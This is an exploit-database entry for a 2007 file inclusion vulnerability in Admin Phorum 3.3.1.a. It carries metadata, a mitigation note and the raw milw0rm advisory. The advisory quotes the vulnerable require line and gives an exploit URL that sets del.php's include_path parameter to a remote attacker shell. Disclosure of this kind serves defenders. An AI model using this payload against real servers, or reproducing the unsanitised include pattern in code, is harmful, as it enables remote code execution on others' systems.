header-logo
Suggest Exploit
vendor:
Admin Phorum
by:
Gold_M <Hacker_ [at] w.Cn> [Mahmood_ali]
7.5
CVSS
HIGH
File Include
CWE
Product Name: Admin Phorum
Affected Version From: 3.3.1.a
Affected Version To: 3.3.1.a
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Admin Phorum 3.3.1.a (del.php include_path)File Include Vulnerability

This vulnerability allows an attacker to include arbitrary files by manipulating the 'include_path' parameter in the 'del.php' script of Admin Phorum 3.3.1.a. By exploiting this vulnerability, an attacker can execute arbitrary code or disclose sensitive information.

Mitigation:

To mitigate this vulnerability, it is recommended to apply the latest patch or update to a secure version of Admin Phorum. Additionally, ensure that input validation and sanitization are implemented for user-supplied parameters.
Source

Exploit-DB raw data:

 #########################################################################
 #                                                                       #
 # Admin Phorum 3.3.1.a (del.php include_path)File Include Vulnerability #
 #                                                                       #
 # Author:  Gold_M <Hacker_ [at] w.Cn>  [Mahmood_ali]                    #
 #                                                                       #
 # Homepage: Www.Tryag.Cc                                                #
 #                                                                       #
 #########################################################################

 #########################################################################
 # Download S : http://www.phpforums.net/admin331.zip                    #
 # Other Info : http://www.phpforums.net/index.php?dir=dld               # 
 #                                                                       #
 # v.Code : Line 3                                                       #
 #                                                                       #
 # require "$include_path/delete_message.php";                           #
 #                                                                       #
 # Exploit:                                                              #
 # http://[VicTim]/[PaTh]/actions/del.php?include_path=[SHELL-TRYAG]     #
 #                                                                       #
 #########################################################################

# milw0rm.com [2007-02-27]